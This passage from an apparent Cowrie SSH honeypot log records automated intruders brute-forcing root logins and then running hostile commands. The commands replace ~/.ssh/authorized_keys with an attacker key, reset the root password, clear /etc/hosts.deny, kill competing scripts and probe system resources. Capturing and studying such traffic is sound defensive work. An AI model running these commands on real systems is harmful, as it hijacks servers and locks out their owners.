enssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:36:13.449435Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.login.success","username":"root","password":"Radore1234","message":"login attempt [root/Radore1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:36:14.211889Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:14.584053Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:36:14.584787Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:36:14.586143Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:14.767875Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:15.208360Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:36:15.209063Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:36:15.379317Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:15.380282Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":37966,"dst_ip":"1.2.3.4","dst_port":22,"session":"0369fcde63f3","protocol":"ssh","message":"New connection: 103.59.95.12:37966 (1.2.3.4:22) [session: 0369fcde63f3]","sensor":"my-vps","timestamp":"2025-09-09T04:36:26.770207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:36:26.771252Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:36:27.037360Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:27.619068Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T04:36:27.621065Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:27.821959Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.login.success","username":"root","password":"abc123","message":"login attempt [root/abc123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:36:28.200408Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:28.288032Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"echo \"root:0TUaU9fkJQ3g\"|chpasswd|bash","message":"CMD: echo \"root:0TUaU9fkJQ3g\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-09T04:36:28.288718Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4c21b1bfb0446ca61aa124013223e6b4aa20dde18351f73c84a0736cd6c89528","size":21,"shasum":"4c21b1bfb0446ca61aa124013223e6b4aa20dde18351f73c84a0736cd6c89528","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/4c21b1bfb0446ca61aa124013223e6b4aa20dde18351f73c84a0736cd6c89528 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:28.518244Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:28.783206Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:36:28.783899Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:36:28.784804Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:28.986320Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-09T04:36:28.987022Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:29.056914Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-09T04:36:29.159093Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:29.160030Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:29.608157Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-09T04:36:29.608868Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:29.688292Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:36:29.688983Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:29.802073Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:36:29.958871Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:29.959773Z","src_ip":"103.59.95.12","session":"0369fcde63f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:30.181392Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-09T04:36:30.182279Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":37968,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1531a7a59ac","protocol":"ssh","message":"New connection: 103.59.95.12:37968 (1.2.3.4:22) [session: a1531a7a59ac]","sensor":"my-vps","timestamp":"2025-09-09T04:36:30.223076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:36:30.223860Z","src_ip":"103.59.95.12","session":"a1531a7a59ac"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:30.385195Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.closed","duration":31.292054653167725,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:30.487194Z","src_ip":"212.227.235.229","session":"267e3d83d04e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:36:30.488108Z","src_ip":"103.59.95.12","session":"a1531a7a59ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:30.851096Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-09T04:36:30.851882Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-09T04:36:30.852335Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:31.043829Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:31.452275Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-09T04:36:31.453012Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:31.623749Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:36:31.649715Z","src_ip":"103.59.95.12","session":"a1531a7a59ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:32.125133Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-09T04:36:32.125863Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:32.295927Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:32.706990Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T04:36:32.707952Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:32.889399Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:33.054477Z","src_ip":"103.59.95.12","session":"a1531a7a59ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:33.244411Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-09T04:36:33.245106Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":37974,"dst_ip":"1.2.3.4","dst_port":22,"session":"328ca02c19a3","protocol":"ssh","message":"New connection: 103.59.95.12:37974 (1.2.3.4:22) [session: 328ca02c19a3]","sensor":"my-vps","timestamp":"2025-09-09T04:36:33.318418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:36:33.319118Z","src_ip":"103.59.95.12","session":"328ca02c19a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:36:33.415202Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:36:33.587542Z","src_ip":"103.59.95.12","session":"328ca02c19a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:36:33.848996Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-09T04:36:33.849774Z","src_ip":"102.68.86.62","session":"898672ae67c8"}
